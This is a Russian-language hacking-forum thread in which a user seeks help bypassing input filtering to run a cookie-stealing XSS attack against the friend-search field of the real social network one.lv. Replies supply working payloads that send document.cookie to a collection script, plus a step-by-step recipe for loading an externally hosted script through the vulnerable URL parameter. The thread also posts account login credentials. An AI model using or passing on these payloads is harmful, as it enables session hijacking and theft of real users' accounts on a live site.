xss шифровка, обойти фильтр

помогите вставить скрипт
--><script>document.write(String.fromCharCode(<script>document.write("<img src=http://127.0.0.1/skript.php?kuki_one="+escape(document.cookie)+">");</script>));</script><!--
и обойти фильтр
Я ломал голову, да нету у меня особых навыков навыков, но хотелось бы сделать, помогите пожалуйста перекодировать чтоб сайт принял мою наживу

 

А фильтр на что ругаеться?

 

в программе inetcrack http://old.antichat.ru/inetcrack/можно перевести

 

http://old.antichat.ru/crackchat/HTML/
кури.

 

я честно не могу разобратся в чём дело но ко мне доходит только: &quot; escape(document.cookie) &quot;

по моему он не обробатывает плюсы, но когда я заменил плюсы на %2B он всё равно это же и присылает.

P.S. большое спасибо за отзывчевость

 

если ты не в курсе инет кряк как раз и делает это, есть такая строка как стринг =\ хех

 

я всё равно могу и декодировать и тут http://ha.ckers.org/xss.html#XSScalc , там всё же есть? не так ли? =[

эту уязвимость я пытаюсь осуществить на сайте one.lv (в поле слева - найти друга (http://c7.one.lv/navigate.do?st.id=community.ownfriends.page&st.friends.fl.search=тут)

помогите подходяще закодировать пробовал кодировать весь урл, всё равно не работает...

Пожалуйста для меня это вопрос сложный, уже 2 день парюсь

 

пля. там нужна регистрация... При реге надо воодить телефон =\ Я так понял туда пасс отправляеться =\

 

ой забыл, я хотел написать и подготовленый акаунт, извеняюсь
Login: offx
password: antichat

кстате, когда я ему впариваю %22%2B%22 он их декодирует не в: "+" (как должно быть) а в: &quot; &quot;

 

http://c7.one.lv/navigate.do?st.id=community.ownfriends.page&st.friends.fl.search=%22%3E;%3Cscript%20src=http://lamer-power.jino-net.ru/hek%3E%20%3C/script%3E

 

да, это я смог, но извини, я не понимаю как из этого извлечь выгоду... мне бы к ссылке приплюсовать чтобы отпровлялись кукисы, допустим как тут: <img src=http://127.0.0.1/skript.php?kuki_one="+escape(document.cookie)+">

 

<script>img = new Image(); img.src = "Yoursniffer?"+document.cookie;</script>

 

ну вот тут и проблема, у меня не получается... =\ он мои ковычки и плюсики не принимает

 

Юзай src =)
Создаешь файл, например, "hek"
Открываешь текстовым редактором и пишешь туда сл. текст:

Code:

var img = new Image(); 
img.src = "http://127.0.0.1/skript.php?kuki_one="+document.cookie;

Теперь заливаешь его на сайт...
Теперь твоя XSS должна выгледить так:
http://c7.one.lv/navigate.do?st.id=community.ownfriends.page&st.friends.fl.search=1;"><script src=http://Yoursite/hek>&nbsp;</script>
И нету никаких ковычек =\